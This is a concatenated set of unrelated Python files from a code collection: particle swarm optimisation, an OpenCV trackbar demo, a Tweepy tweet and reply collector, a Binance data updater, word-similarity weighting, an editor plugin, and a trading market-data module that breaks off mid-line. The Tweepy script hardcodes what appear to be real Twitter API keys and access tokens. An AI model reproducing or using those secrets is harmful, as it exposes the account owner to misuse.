2.5\n self.r1 = np.random.rand()\n self.r2 = np.random.rand()\n vmax = 6\n # Apply equation to each component of the velocity, add it to corresponding position component\n for i, velocity in enumerate(self._velocity):\n # velocity = 0.72984 * (velocity + c * e1 * (model._bestPosition[i] - model._position[i]) + c * e2 * (model._nbBestPosition[i] - model._position[i]))\n #velocity = self.w*velocity + self.c1 * self.r1 * (self._bestPosition[i] - self._position[i]) + \\\n # self.c2 * self.r2 * (self._nbBestPosition[i] - self._position[i])\n velocity = self.w*velocity + self.c1 * self.r1 * (self._bestPosition[i] - self._position[i]) + \\\n self.c2 * self.r2 * (self._bestPosition[i] - self._position[i])\n\n if abs(velocity) > vmax and abs(velocity) is velocity:\n velocity = vmax\n elif abs(velocity) > vmax:\n velocity = -vmax\n velocity = self.sigmoid(velocity)\n # print \"vel:\", velocity\n for j in range(0,self._typerange):\n if self._nbbestfitness-self._bestfitness>(self._bestfitness/self.dim):\n if np.random.rand(1) < (j + 1) * velocity / self._typerange: # 离散量\n self._position[i] = (j+1)%self._typerange\n else:\n if np.random.rand(1)<(j+1)*velocity/self._typerange: #离散量\n self._position[i] = j\n\n # if np.random.rand(1) < velocity-1: #这是给二进制用的\n # self._position[i] = 1\n # else:\n # self._position[i] = 0\n if self._position.max() > self._typerange: # 生成数字是否错误?\n print(\"bigger than 2,22222\")\n quit()\n\n def setgbest(self,gbestpositiion, gbestfit):\n self._nbBestPosition=np.copy(gbestpositiion)\n self._nbbestfitness=gbestfit\n\n def sigmoid(self, x):\n return 1.0 / (1.0 + np.exp(-(x)))\n\n# ---- Swarm representation\nclass SwarmModel:\n _particles = None\n _neighbourhoods = None\n _bestPosition = None\n _bestPositionFitness = None\n\n def __init__(self,objectfun):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = None\n self._objectfun=objectfun\n\n def initpaticleparas(self,w,c1,c2,r1,r2):\n self.w=w\n self.c1=c1\n self.c2=c2\n self.r1=r1\n self.r2=r2\n\n def initSwarm(self, truckset, nParticles = 1, dimensions = 1):\n # Create Swarm\n for i in range(nParticles):\n newParticle = ParticleModel(self._objectfun)\n newParticle.initParticle(dimensions,truckset)\n newParticle.initparas(self.w,self.c1,self.c2,self.r1,self.r2)\n self._particles.append(newParticle)\n\n #self._neighbourhoods = self._neighbourhoodController.initNeighbourhoods(self)\n self.updateSwarmBestPosition()\n\n def updateSwarmBestPosition(self):\n # Find swarm best position and save it in swarm\n for nb in self._particles: #self._neighbourhoods:\n #self._neighbourhoods.updateNeighbourhoodBestPosition(nb)\n if self._bestPositionFitness is None or nb._bestfitness < self._bestPositionFitness:\n self._bestPositionFitness = nb._bestfitness\n self._bestPosition = np.copy(nb._bestPosition)\n for curParticle in self._particles:\n curParticle.setgbest(self._bestPosition,self._bestPositionFitness)\n\n # Update all particles in the swarm\n def updateSwarm(self):\n for curParticle in self._particles:\n print(curParticle._position)\n curParticle.updatePosition()\n print(curParticle._position)\n print(curParticle._fitness)\n curParticle.updateFitness()\n\n self.updateSwarmBestPosition()\n return self._bestPositionFitness\n\n def drawpic(self):\n plt.figure(1)\n plt.title(\"Figure1\")\n plt.grid(True)\n\n plt.ion()\n try:\n i=0\n for curParticle in self._particles:\n plt.scatter(i,curParticle._bestfitness)\n i+=1\n plt.pause(0.01)\n #plt.clf()\n except Exception as err:\n print(err)\n\n\n# ---- Neighbourhood representation,用来找全局,在图上\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = None\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = None\n\n def initNeighbourhoods(self, swarm, topology=\"gbest\"):\n if topology is \"gbest\":\n return [NeighbourhoodModel(swarm._particles)]\n elif topology is \"lbest\":\n neighbourhoods = []\n for idx, curParticle in enumerate(swarm._particles):\n previousParticle = None\n nextParticle = None\n if idx is 0:\n # Previous is last, next is next\n nextParticle = swarm._particles[idx + 1]\n previousParticle = swarm._particles[len(swarm._particles) - 1]\n elif idx is len(swarm._particles) - 1:\n # Previous is previous, next is first\n nextParticle = swarm._particles[0]\n previousParticle = swarm._particles[idx - 1]\n else:\n # Previous is previous, next is next\n nextParticle = swarm._particles[idx + 1]\n previousParticle = swarm._particles[idx - 1]\n neighbourhoods.append(NeighbourhoodModel([previousParticle, curParticle, nextParticle]))\n return neighbourhoods\n","sub_path":"PSOModel.py","file_name":"PSOModel.py","file_ext":"py","file_size_in_byte":9084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"327536638","text":"# encoding: utf-8\n\n\"\"\"\n2018-7-16 20:56, track_bar.py created by wq.\n\"\"\"\n\n# 把滑动条绑定到 OpenCV窗口。通过调节滑动条,调节画板颜色。\nimport cv2\nimport numpy as np\n\nr_1 = 0\ng_1 = 0\nb_1 = 0\n\n\ndef nothing(x):\n pass\n\n\n# 画图监听,监听鼠标事件(包括鼠标事件和事件发生位置)\ndef draw_listener(event, x, y, flags, param):\n global r_1, g_1, b_1\n if event == cv2.EVENT_LBUTTONDBLCLK:\n cv2.circle(img, (x, y), 30, (r_1, g_1, b_1), -1)\n\n\n# 创建一副黑色图像\nimg = np.zeros((300, 512, 3), np.uint8)\ncv2.namedWindow(\"canvas\")\n\n# 创建四个滑动条,参数分别是:名称、所属窗口,默认值、最大值、滑动过程同步回调函数\ncv2.createTrackbar('R', \"canvas\", 0, 255, nothing)\ncv2.createTrackbar('G', \"canvas\", 0, 255, nothing)\ncv2.createTrackbar('B', \"canvas\", 0, 255, nothing)\n\nswitch = '0:OFF\\n1:ON'\ncv2.createTrackbar(switch, \"canvas\", 0, 1, nothing)\n\n# 设置鼠标监听\ncv2.setMouseCallback(\"canvas\", draw_listener) # 为鼠标事件设置监听回调函数\n\nwhile 1:\n cv2.imshow(\"canvas\", img)\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break\n\n r = cv2.getTrackbarPos(\"R\", 'canvas')\n g = cv2.getTrackbarPos(\"G\", 'canvas')\n b = cv2.getTrackbarPos(\"B\", 'canvas')\n s = cv2.getTrackbarPos(switch, 'canvas')\n\n # 禁止 各个滑动条的功能\n if s == 0:\n img[:] = 0\n # 使能各个滑动条的功能,将 img 的所有像素改成 BGR\n else:\n r_1, g_1, b_1 = b, g, r\n\ncv2.destroyAllWindows()\n","sub_path":"part_5_trackbar/track_paint.py","file_name":"track_paint.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"342754815","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nfrom tweepy import API\nfrom tweepy import Cursor\nimport csv\nimport datetime\n\nclass TwitterClient:\n def __init__(self, handle=None):\n a= Authentication()\n self.auth = a.twitterAuthentication()\n self.twitterClient = API(self.auth, wait_on_rate_limit=True)\n self.handlefortimeline = handle\n\n def get_tweets_of_someone(self):\n today = datetime.datetime.today()\n yesterday = today - datetime.timedelta(days=1)\n prevFileName = \"tweets-\"+str(self.handlefortimeline)+'-'+str(yesterday.date())+'.csv'\n prevfile = './Resources/Tweets/'+prevFileName\n openFile = open(prevfile,'r')\n csvReader = csv.reader(openFile)\n firstRow = []\n firstRow = next(csvReader)\n from_id = firstRow[1]\n openFile.close()\n newFileName = \"tweets-\"+str(self.handlefortimeline)+'-'+str(today.date())+'.csv'\n newfile = './Resources/Tweets/'+newFileName\n csvFile = open(newfile,'w',newline='')\n csvWriter = csv.writer(csvFile)\n print(self.handlefortimeline,from_id)\n for tweet in Cursor(self.twitterClient.user_timeline, id = self.handlefortimeline, since_id = from_id).items(100):\n csvWriter.writerow([tweet.created_at,tweet.id,tweet.text.encode('utf-8')])\n csvFile.close()\n\n def find_replies_to_tweets(self):\n today = datetime.datetime.today()\n yesterday = today - datetime.timedelta(days=1)\n prevFileName = \"tweets-\"+str(self.handlefortimeline)+'-'+str(yesterday.date())+'.csv'\n prevfile = './Resources/tweets/'+prevFileName\n openFile = open(prevfile,'r')\n csvReader = csv.reader(openFile)\n for row in csvReader:\n id = row[1]\n newFileName = \"replies-\"+str(self.handlefortimeline)+'-'+'for_tweet_id-'+id+'-'+str(today.date())+'.csv'\n newfile = './Resources/Replies/'+newFileName\n csvFile = open(newfile,'w',newline='')\n csvWriter = csv.writer(csvFile)\n for_user = 'to:'+self.handlefortimeline\n for tweet in Cursor(self.twitterClient.search,q=for_user, since_id=id).items(200):\n if hasattr(tweet, 'in_reply_to_status_id_str'):\n if (tweet.in_reply_to_status_id_str==id):\n csvWriter.writerow([tweet.created_at,tweet.id,tweet.text.encode('utf-8'),tweet.in_reply_to_status_id_str])\n csvFile.close()\n openFile.close()\n\nclass Authentication:\n\n def twitterAuthentication(self):\n auth = OAuthHandler(\"YO3onH8vbakEW2ZCzaXbx01VW\", \"FsupJ0Cu595QPXPswPWbmetm6ktZSy86QXN4TN3aHa3AdrVSU9\")\n auth.set_access_token(\"42595577-IRgFyBq8btWa50H11GZIwE6EexFjQI2lmLGh5gOTV\", \"lxhe0unY42ZMF5bH9CLv7K9ioeoiSkM7PaPqQ2tDf6m0v\")\n return auth\n\n\nif __name__ == '__main__':\n file = \"./Resources/Handles.csv\"\n handles=[]\n with open(file,'r') as csvFile:\n csvReader = csv.reader(csvFile)\n for row in csvReader:\n handles.append(row[0])\n csvFile.close()\n for handle in handles:\n print(handle)\n tc = TwitterClient(handle)\n tc.get_tweets_of_someone()\n tc.find_replies_to_tweets()\n","sub_path":"Data_Collection.py","file_name":"Data_Collection.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"462394367","text":"# coding: utf-8\n# Módulo 1 - Coletando e Armazenando dados históricos do mercado\n\n\"\"\"\nDeve ler o arquivo de dados de mercado, caso exista, ou criá-lo a partir de dados da corretora, respeitando os \nparâmetros do arquivo de parâmetros.\n\"\"\"\n\nimport sys\nimport os\n\nsys.path.append(os.getcwd().split(sep=\"modules\")[0])\nimport modules\nfrom modules import func\n\nfrom datetime import datetime\nfrom datetime import date\nimport pandas as pd\n\ndef prod (param):\n \"\"\"\n Retorna o framework de trabalho, 'dados', bem como uma variável de controle ('time_aq_comp') a fim de startar \n ou não a estratégia do módulo seguinte.\n \"\"\"\n \n par = param[1].split()[2]; candle = param[0].split()[2]; time_aq = param[12].split('=')[1][1:]; datapath = str(param[4].split()[2]).format(par,candle); data_name = 'dados.csv'\n candle_ent = '{}m'.format(candle)\n\n try:\n dados = pd.read_csv(datapath+data_name, index_col='Open_time', parse_dates=['Open_time','Close_time'], infer_datetime_format=True) \n\n print('dados lidos') #TESTE, APAGAR DEPOIS DE OK\n \n dif_minut = abs(float(((datetime.now() - dados.Close_time[len(dados)-1]).total_seconds() - 1)/60)) #Tirando 1s fica ok\n\n if (dif_minut > float(candle)): \n \n time_aq = '{} minute ago UTC'.format(int(dif_minut) + int(candle))\n time_aq_comp = '{} minute ago UTC'.format(int(dif_minut)) #Necessário apenas para msg de controle\n \n #Faz a solicitação do complemento do dado\n hist_complem = func.data_historico(par, candle_ent, time_aq)\n \n #Junta os dataframes\n dados = dados.append(hist_complem) \n \n #Despreza a última amostra caso o fechamento do último candle seja maior que o presente\n if ( dados.Close_time[len(dados)-1] > datetime.now() ): dados = dados.iloc[:len(dados)-1] \n \n mess = 'Foi preciso completar o dado em {}'.format(time_aq_comp) #TESTE, APAGAR DEPOIS DE OK\n print(mess) #TESTE, APAGAR DEPOIS DE OK\n \n #Não foi preciso completar o dado, pois o candle fechado já foi analisado.\n else:\n time_aq = 'bypass'\n print('Não foi preciso completar o dado, pois o último candle fechado já foi analisado.') #TESTE, APAGAR DEPOIS DE OK\n \n #NÃO Encontra o arquivo dados.csv na pasta, ENTÃO Cria o arquivo até o instante atual.\n except:\n mess = 'Arquivo não encontrado, criando arquivo de dados.' #TESTE, APAGAR DEPOIS DE OK\n print(mess) #TESTE, APAGAR DEPOIS DE OK\n \n dados = func.data_historico(par, candle_ent, time_aq)\n \n #Despreza a última amostra caso o fechamento do último candle seja maior que o presente\n if ( dados.Close_time[len(dados)-1] > datetime.now() ): dados = dados.iloc[:len(dados)-1]\n \n #Salva os dados históricos\n dados.to_csv(datapath+data_name, index=True, index_label='Open_time', date_format='%Y-%m-%d %H:%M:%S') \n\n return dados, time_aq","sub_path":"app/backend/modules/update_stock_data/binance.py","file_name":"binance.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"407261458","text":"# Adding a eud_b_weighted, which, unlike eud_weighted, is obtained by calculating the square root of weighted Euclidean distance squared. \n# This program calculates the weighted cosine, sine, Euclidean distance and Euclidean distance squared. \nimport math, csv, cPickle as pickle\nfrom mylibrary import invert, parseinterval, weightedavg\nfrom lists import windows\n\n# load words_nonzero, cos, sin\nwith open('words_nonzero.pickle','rb') as words_nonzerosave:\n words_nonzero = pickle.load(words_nonzerosave)\nwith open('cos.pickle','rb') as cossave:\n cos = pickle.load(cossave)\nwith open('sin.pickle','rb') as sinsave:\n sin = pickle.load(sinsave)\nwith open('eud.pickle','rb') as eudsave:\n eud = pickle.load(eudsave)\nwith open('eudsq.pickle','rb') as eudsqsave:\n eudsq = pickle.load(eudsqsave)\n\n# specify the intervals of words, windows to include\n# the words come from: words_nonzero, not words any more\ninterval_words = raw_input('Specify the index intervals of words to include, within [0, %s], separated by semicolon: ' %str(len(words_nonzero)-1))\nwindows_toinclude = raw_input('Choose from windows %s, separated by comma: ' %str(windows)).split(',')\n\n# specify weighting of each window\nweights = map(float, raw_input('Specify weighting for each window, separated by comma: ').split(','))\n\n# convert intervals into indices pointing to corresponding lists or dictionaries\nindices_words = parseinterval(interval_words)\n\n# parse windows values back to relative positions, that is, -2:0, -1:1...\nindices_windows = []\nfor window in windows_toinclude:\n t = int(window)\n if t < 0:\n indices_windows.append(t+2)\n else:\n indices_windows.append(t+1)\n\n# create sublists from indices: a list of words, and a list of their corresponding indices in words_nonzero\nwords_toinclude = []\nindices_toinclude = []\nfor index_words in indices_words:\n i = index_words[0]\n while i <= index_words[1]:\n words_toinclude.append(words_nonzero[i])\n indices_toinclude.append(i)\n i += 1\n\n# calculate the weighted cosine, sine, Euclidean distance and Euclidean distance squared\ncos_weighted = {}\nsin_weighted = {}\neud_weighted = {}\neudsq_weighted = {}\neud_b_weighted = {}\nfor word in words_toinclude:\n cos_weighted[word] = []\n sin_weighted[word] = []\n eud_weighted[word] = []\n eudsq_weighted[word] = []\n eud_b_weighted[word] = []\n for i in indices_toinclude:\n cos_raw = []\n sin_raw = []\n eud_raw = []\n eudsq_raw = []\n for window in indices_windows:\n cos_raw.append(cos[word][window][i])\n sin_raw.append(sin[word][window][i])\n eud_raw.append(eud[word][window][i])\n eudsq_raw.append(eud[word][window][i])\n cos_pikapika = weightedavg(cos_raw, weights)\n sin_pikapika = weightedavg(sin_raw, weights)\n eud_pikapika = weightedavg(eud_raw, weights)\n eudsq_pikapika = weightedavg(eudsq_raw, weights)\n if cos_pikapika > 1.0:\n cos_pikapika = 1\n elif cos_pikapika < 0.00001:\n cos_pikapika = 0\n if sin_pikapika > 1.0:\n sin_pikapika = 1\n elif sin_pikapika < 0.00001:\n sin_pikapika = 0\n if eud_pikapika > math.sqrt(2):\n eud_pikapika = math.sqrt(2)\n elif eud_pikapika < 0.00001:\n eud_pikapika = 0\n if eudsq_pikapika > math.sqrt(2):\n eudsq_pikapika = math.sqrt(2)\n elif eudsq_pikapika < 0.00001:\n eudsq_pikapika = 0\n cos_weighted[word].append(cos_pikapika)\n sin_weighted[word].append(sin_pikapika)\n eud_weighted[word].append(eud_pikapika)\n eudsq_weighted[word].append(eudsq_pikapika)\n eud_b_weighted[word].append(math.sqrt(eudsq_pikapika))\n\n# write to csv\nwith open('cos_weighted.csv','wb') as cos_weightedsave:\n writer = csv.writer(cos_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(cos_weighted[word])\nwith open('sin_weighted.csv','wb') as sin_weightedsave:\n writer = csv.writer(sin_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(sin_weighted[word])\nwith open('eud_weighted.csv','wb') as eud_weightedsave:\n writer = csv.writer(eud_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(eud_weighted[word])\nwith open('eudsq_weighted.csv','wb') as eudsq_weightedsave:\n writer = csv.writer(eudsq_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(eudsq_weighted[word])\nwith open('eud_b_weighted.csv','wb') as eud_b_weightedsave:\n writer = csv.writer(eud_b_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(eud_b_weighted[word])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"263000989","text":"\"\"\"\nBracketHighlighter.\n\nCopyright (c) 2013 - 2016 Isaac Muse \nLicense: MIT\n\"\"\"\nimport re\n\nRE_DEF = re.compile(r\"\\s*(?:(?:private|public|protected)\\s+)?(def).*?\")\nRE_KEYWORD = re.compile(r\"(\\s*\\b)[\\w\\W]*\")\nSPECIAL_KEYWORDS = ('do',)\nNORMAL_KEYWORDS = ('for', 'until', 'unless', 'while', 'class', 'module', 'if', 'begin', 'case')\n\n\ndef post_match(view, name, style, first, second, center, bfr, threshold):\n \"\"\"Strip whitespace from being targeted with highlight.\"\"\"\n\n if first is not None:\n # Strip whitespace from the beginning of first bracket\n open_bracket = bfr[first.begin:first.end]\n if open_bracket not in SPECIAL_KEYWORDS:\n open_bracket_stripped = open_bracket.strip()\n if open_bracket_stripped not in NORMAL_KEYWORDS:\n m = RE_DEF.match(open_bracket)\n if m:\n first = first.move(first.begin + m.start(1), first.begin + m.end(1))\n else:\n m = RE_KEYWORD.match(open_bracket)\n if m:\n first = first.move(first.begin + m.end(1), first.end)\n return first, second, style\n","sub_path":"bh_modules/rubykeywords.py","file_name":"rubykeywords.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"640519345","text":"import datetime\nfrom dateutil.relativedelta import relativedelta\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\n\nfrom botcoin.common.events import MarketEvent\nfrom botcoin.utils import round, is_dataframe_good, delta_is_one_business_day, now, pad_empty_df_values\n\nclass MarketData(object):\n \"\"\" General MarketData that is subclassed in both live and backtest modes. \"\"\"\n\n def __init__(self, csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size=None):\n\n if not symbol_list:\n raise ValueError(\"Empty SYMBOL_LIST\")\n\n if bar_size and type(bar_size) not in (datetime.timedelta, relativedelta):\n raise ValueError(\"Bar size needs to be datetime.timedelta or dateutil.relativedelta\")\n\n # To keep track how long loading everything took\n start_load_datetime = now()\n self.symbol_list = sorted(list(set(symbol_list)))\n self.bar_size = bar_size\n self.csv_dir = csv_dir\n\n # Dictionary where all symbol data is kept\n self._data = {}\n # Maintains last date found for each symbol file\n self._last_historical_bar_for = {}\n\n # Parsing csvs, treating data and setting bars\n self._read_all_csvs(csv_dir, normalize_prices, normalize_volume, bar_size)\n\n # Last datetime in historical data after index is combined, meaning datetime can be from any symbol\n self.last_historical_bar_at = self._data[self.symbol_list[0]]['df'].index[-1]\n\n self.load_time = now()-start_load_datetime\n\n def _read_all_csvs(self, csv_dir, normalize_prices, normalize_volume, bar_size):\n\n comb_index = None\n\n for s in self.symbol_list:\n\n self._data[s] = {}\n filename = s + '.csv'\n\n self._data[s]['df'] = self._read_csv(csv_dir, filename, normalize_prices, normalize_volume, bar_size)\n\n if not is_dataframe_good(s, self._data[s]['df'], self.bar_size):\n raise ValueError('Inconsistencies found in data, aborting')\n\n self._last_historical_bar_for[s] = self._data[s]['df'].index[-1]\n\n # Combine different file indexes to account for nonexistent values\n # (needs 'is not None' because of Pandas 'The truth value of a DatetimeIndex is ambiguous.' error)\n comb_index = comb_index.union(self._data[s]['df'].index) if comb_index is not None else self._data[s]['df'].index\n\n # Reindex\n for s in self.symbol_list:\n self._data[s]['df'] = self._data[s]['df'].reindex(index=comb_index, method=None)\n\n # Pad empty values\n for s in self.symbol_list:\n self._data[s]['df'] = pad_empty_df_values(self._data[s]['df'])\n\n @staticmethod\n def _read_csv(csv_dir, filename, normalize_prices, normalize_volume, bar_size):\n\n df = pd.io.parsers.read_csv(\n os.path.expanduser(csv_dir+filename),\n header=None,\n index_col=0,\n names=['datetime', 'open', 'high', 'low', 'close', 'volume', 'adj_close']\n )\n\n try:\n # Tries to index with %Y-%m-%d %H:%M:%S format\n df.index = pd.to_datetime(df.index, format='%Y-%m-%d %H:%M:%S')\n except ValueError:\n # On ValueError try again with %Y-%m-%d\n df.index = pd.to_datetime(df.index, format='%Y-%m-%d')\n\n # Resamples data if bar_size is 'MONTHLY', otherwise leaves it as is (supposedly daily)\n if bar_size == relativedelta(months=1):\n # Resample to monthly bar_size\n df = df.resample('M', how={'open':'first','high':'max','low':'min','close': 'last','volume': 'sum','adj_close': 'last'})\n elif bar_size == relativedelta(weeks=1):\n # Resample to weekly bar_size\n df = df.resample('w', how={'open':'first','high':'max','low':'min','close': 'last','volume': 'sum','adj_close': 'last'})\n\n\n # Reorder elements if resampling was necessary \n df = df[['open', 'high', 'low', 'close', 'volume', 'adj_close']]\n \n if not df['adj_close'].isnull().all():\n # Rounding adj_close to prevent rounding problems when low == close\n df['adj_close'] = df['adj_close'].apply(round)\n\n # Normalizing prices and volume based on adj_close prices\n if normalize_volume:\n df['volume'] = df['volume']*(df['adj_close']/df['close'])\n if normalize_prices:\n for c in ('open', 'high', 'low'):\n df[c] = df[c]*(df['adj_close']/df['close'])\n df['close'] = df['adj_close']\n\n # Rounding prices\n for c in ('open', 'high', 'low', 'close'):\n df[c] = df[c].apply(round)\n\n return df\n\n def _current_bar(self, symbol):\n \"\"\" Returns the current bar's prices, volume and last_timestamp as an ordered tuple. \"\"\"\n return (\n self._data[symbol]['date'],\n self._data[symbol]['open'],\n self._data[symbol]['high'],\n self._data[symbol]['low'],\n self._data[symbol]['close'],\n self._data[symbol]['volume'],\n )\n\n def now(self):\n return self.updated_at\n\n def last_price(self, symbol):\n \"\"\" Returns last recorded price \"\"\"\n if not 'close' in self._data[symbol]:\n raise BarError(\"No price recorded for {} today\".format(symbol))\n return self._data[symbol]['close']\n\n def bars(self, symbol, N):\n # Returns latest N bars including current bar\n return self._bar_dispatcher('bars', symbol, N)\n\n def past_bars(self, symbol, N):\n # Returns latest N bars not including current bar\n return self._bar_dispatcher('past_bars', symbol, N)\n\n def current_bar(self, symbol):\n # Returns current bar's OHLC\n return self._bar_dispatcher('current_bar', symbol)\n\n def last_bar(self, symbol):\n # Returns last_bar's values\n return self._bar_dispatcher('last_bar', symbol)\n\n def _bar_dispatcher(self, option, symbol, N=1, ):\n if option == 'current_bar':\n bars = [self._current_bar(symbol)]\n\n elif option == 'last_bar':\n bars = self._data[symbol]['latest_bars'][-1:]\n\n elif option == 'bars':\n bars = self._data[symbol]['latest_bars'][-(N-1):]\n bars.append(self._current_bar(symbol))\n\n elif option == 'past_bars':\n bars = self._data[symbol]['latest_bars'][-N:]\n\n if not bars:\n raise BarError(\"Something wrong with latest_bars\")\n\n if len(bars) != N:\n raise BarError(\"Not enough bars yet.\")\n\n if len([bar for bar in bars if bar[4] > 0.0]) != len(bars):\n raise BarError(\"Empty bars found. Latest_bars for {} has one or more 0.0 close prices, and will be disconsidered.\".format(symbol))\n\n return Bars(bars, True) if option in ('current_bar', 'last_bar') else Bars(bars)\n\n\nclass Bars(object):\n \"\"\"\n Object exposed to users to reflect prices on a single or on multiple days.\n \"\"\"\n def __init__(self, latest_bars, single_bar=False):\n self.length = len(latest_bars)\n\n if single_bar:\n self.date = latest_bars[-1][0]\n self.open = latest_bars[-1][1]\n self.high = latest_bars[-1][2]\n self.low = latest_bars[-1][3]\n self.close = latest_bars[-1][4]\n self.volume = latest_bars[-1][5]\n self.is_positive = True if self.close > self.open else False\n else:\n self.date = [i[0] for i in latest_bars]\n self.open = [i[1] for i in latest_bars]\n self.high = [i[2] for i in latest_bars]\n self.low = [i[3] for i in latest_bars]\n self.close = [i[4] for i in latest_bars]\n self.volume = [i[5] for i in latest_bars]\n self.returns = (self.close[-1] - self.open[0])/self.open[0]\n\n def mavg(self, price_type='close'):\n return round(np.mean(getattr(self, price_type)))\n\n def bollingerbands(self, k, price_type='close'):\n ave = np.mean(getattr(self, price_type))\n sd = np.std(getattr(self, price_type))\n upband = ave + (sd*k)\n lwband = ave - (sd*k)\n return round(ave), round(upband), round(lwband)\n\n def __len__(self):\n return self.length\n\nclass BarError(Exception):\n \"\"\" Required for a specific type of Error that is catched on portfolio. \"\"\"\n pass\n\n\nclass BacktestMarketData(MarketData):\n\n def __init__(self, csv_dir, symbol_list, normalize_prices, normalize_volume,\n date_from, date_to, bar_size):\n\n super(BacktestMarketData, self).__init__(csv_dir,symbol_list, normalize_prices, normalize_volume, bar_size)\n\n for s in symbol_list:\n # Limit between date_From and date_to\n self._data[s]['df'] = self._data[s]['df'][date_from:] if date_from else self._data[s]['df']\n self._data[s]['df'] = self._data[s]['df'][:date_to] if date_to else self._data[s]['df']\n\n # Check for empty dfs\n if self._data[s]['df'].empty:\n logging.warning(\"Empty DataFrame loaded for {}.\".format(s)) # Possibly invalid date ranges?\n\n # Dataframe iterrows generator\n self._data[s]['bars'] = self._data[s]['df'].iterrows()\n\n # List that will hold all rows from iterrows, one at a time\n self._data[s]['latest_bars'] = []\n\n self.continue_execution = True\n self.date_from = self._data[self.symbol_list[0]]['df'].index[0]\n self.date_to = self._data[self.symbol_list[0]]['df'].index[-1]\n\n def _simulate_walk_in_time(self):\n \"\"\"\n Generator that updates all prices based on historical data and raises\n MarketEvents to simulate live trading. The order of events is:\n before_open - open - close - after_close\n \"\"\"\n try:\n # Before day starts, adding bars from yesterday to 'latest_bars'\n for s in self.symbol_list:\n if hasattr(self, 'updated_at'):\n self._data[s]['latest_bars'].append(self._current_bar(s))\n\n cached_values = {s:{} for s in self.symbol_list}\n\n for s in self.symbol_list:\n new_row = next(self._data[s]['bars'])\n\n self._data[s]['date'] = new_row[0]\n cached_values[s]['open'] = new_row[1][0]\n cached_values[s]['high'] = new_row[1][1]\n cached_values[s]['low'] = new_row[1][2]\n cached_values[s]['close'] = new_row[1][3]\n cached_values[s]['volume'] = new_row[1][4]\n\n self.updated_at = new_row[0]\n\n yield MarketEvent('before_open')\n\n for s in self.symbol_list:\n # Pretend you don't know the future :)\n self._data[s]['open'] = cached_values[s]['open']\n self._data[s]['high'] = cached_values[s]['open']\n self._data[s]['low'] = cached_values[s]['open']\n self._data[s]['close'] = cached_values[s]['open']\n self._data[s]['volume'] = 0\n\n yield MarketEvent('on_open')\n\n for s in self.symbol_list:\n self._data[s]['open'] = cached_values[s]['open']\n self._data[s]['high'] = cached_values[s]['high']\n self._data[s]['low'] = cached_values[s]['low']\n self._data[s]['close'] = cached_values[s]['close']\n self._data[s]['volume'] = cached_values[s]['volume']\n\n yield MarketEvent('on_close')\n\n yield MarketEvent('after_close')\n\n except StopIteration:\n self.continue_execution = False\n\n\nclass LiveMarketData(MarketData):\n def __init__(self, events_queue, csv_dir, symbol_list, normalize_prices,\n normalize_volume, symbol_suffix, historical_data_source, bar_size):\n\n super(LiveMarketData, self).__init__(csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size)\n\n self.events_queue = events_queue\n\n assert(datetime.timedelta(days=1)%self.bar_size == datetime.timedelta(0))\n\n if historical_data_source == 'IB':\n\n # Tries to load files. If any file doesn't exit, tries to download all symbols\n try:\n super(LiveMarketData, self).__init__(csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size)\n except OSError:\n download_historical_data(symbol_list, symbol_suffix, csv_dir, historical_data_source)\n super(LiveMarketData, self).__init__(csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size)\n\n # Checks if latest combined datetime is only one business day away from today\n # If it isn't, will try to download all symbols\n if not delta_is_one_business_day(now(), self.last_historical_bar_at):\n download_historical_data(symbol_list, symbol_suffix, csv_dir, historical_data_source)\n super(LiveMarketData, self).__init__(csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size)\n\n # If delta is still not one business day after download, something is wrong\n if not delta_is_one_business_day(now(), self.last_historical_bar_at):\n raise Value\n\n # Checks if last date recorded for a each individual symbol is behind last combined datetime\n for symbol in symbol_list:\n if self._last_historical_bar_for[symbol] != self.last_historical_bar_at:\n logging.error(\"Latest {} data ({}) is behind current combined index {}.\".format(symbol, self._last_historical_bar_for[symbol], self.last_historical_bar_at))\n\n # Adds 'df' to 'latest_bars' as list of lists, just as in historical update_bars\n for s in self.symbol_list:\n self._data[s]['latest_bars'] = self._data[s]['df'].reset_index()[['datetime', 'open', 'high', 'low', 'close', 'volume']].values.tolist()\n\n # Defines which bar date we are waiting for before issuing the next MarketEvent\n d = datetime.date.today()\n today = datetime.datetime(d.year, d.month, d.day, tzinfo=datetime.timezone.utc)\n for i in range(datetime.timedelta(days=1)//self.bar_size):\n if now() < today + self.bar_size*i:\n self.waiting_for_bar_date = today + self.bar_size*i\n logging.info('Current bar is {}, awaiting {} for market event'.format(self.waiting_for_bar_date-self.bar_size, self.waiting_for_bar_date))\n break\n\n def _generate_market_events(self):\n if now() > self.waiting_for_bar_date:\n if not [symbol for symbol in 